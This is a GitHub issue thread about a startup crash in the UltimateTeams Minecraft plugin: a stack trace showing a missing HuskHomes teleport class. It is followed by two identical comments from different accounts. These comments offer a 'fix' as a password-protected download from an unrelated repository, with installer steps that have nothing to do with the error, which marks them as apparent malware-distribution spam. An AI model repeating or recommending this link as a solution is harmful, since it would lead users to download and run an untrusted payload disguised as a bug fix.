### ISSUE TITLE
[BUG] HuskHomes hook

### ISSUE THREAD

**Issue by NyaomiDEV** [xF3d33/UltimateTeams#32]
```
[03:15:18 ERROR]: Error occurred while enabling UltimateTeams v2.4 (Is it up to date?)
java.lang.IllegalStateException: Failed to initialize huskhomes
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.initialize(UltimateTeams.java:84) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.onEnable(UltimateTeams.java:133) ~[UltimateTeams-2.4.jar:?]
        at org.bukkit.plugin.java.JavaPlugin.setEnabled(JavaPlugin.java:288) ~[linearpaper-api-1.21.1-R0.1-SNAPSHOT.jar:?]
        at io.papermc.paper.plugin.manager.PaperPluginInstanceManager.enablePlugin(PaperPluginInstanceManager.java:202) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at io.papermc.paper.plugin.manager.PaperPluginManagerImpl.enablePlugin(PaperPluginManagerImpl.java:109) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at org.bukkit.plugin.SimplePluginManager.enablePlugin(SimplePluginManager.java:520) ~[linearpaper-api-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.craftbukkit.CraftServer.enablePlugin(CraftServer.java:640) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at org.bukkit.craftbukkit.CraftServer.enablePlugins(CraftServer.java:589) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at net.minecraft.server.MinecraftServer.loadWorld0(MinecraftServer.java:754) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at net.minecraft.server.MinecraftServer.loadLevel(MinecraftServer.java:516) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:330) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1215) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:330) ~[linearpaper-1.21.1.jar:1.21.1-DEV-17d276d]
        at java.base/java.lang.Thread.run(Unknown Source) ~[?:?]
Caused by: java.lang.RuntimeException: java.lang.NoClassDefFoundError: dev/xf3d3/libraries/william278/huskhomes/teleport/TeleportationException
        at UltimateTeams-2.4.jar/dev.xf3d3.libraries.william278.desertwell.util.ThrowingConsumer.accept(ThrowingConsumer.java:45) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.initialize(UltimateTeams.java:82) ~[UltimateTeams-2.4.jar:?]
        ... 13 more
Caused by: java.lang.NoClassDefFoundError: dev/xf3d3/libraries/william278/huskhomes/teleport/TeleportationException
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.lambda$onEnable$6(UltimateTeams.java:133) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.libraries.william278.desertwell.util.ThrowingConsumer.accept(ThrowingConsumer.java:43) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.initialize(UltimateTeams.java:82) ~[UltimateTeams-2.4.jar:?]
        ... 13 more
Caused by: java.lang.ClassNotFoundException: dev.xf3d3.libraries.william278.huskhomes.teleport.TeleportationException
        at org.bukkit.plugin.java.PluginClassLoader.loadClass0(PluginClassLoader.java:197) ~[linearpaper-api-1.21.1-R0.1-SNAPSHOT.jar:?]
        at org.bukkit.plugin.java.PluginClassLoader.loadClass(PluginClassLoader.java:164) ~[linearpaper-api-1.21.1-R0.1-SNAPSHOT.jar:?]
        at java.base/java.lang.ClassLoader.loadClass(Unknown Source) ~[?:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.lambda$onEnable$6(UltimateTeams.java:133) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.libraries.william278.desertwell.util.ThrowingConsumer.accept(ThrowingConsumer.java:43) ~[UltimateTeams-2.4.jar:?]
        at UltimateTeams-2.4.jar/dev.xf3d3.ultimateteams.UltimateTeams.initialize(UltimateTeams.java:82) ~[UltimateTeams-2.4.jar:?]
        ... 13 more
```

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
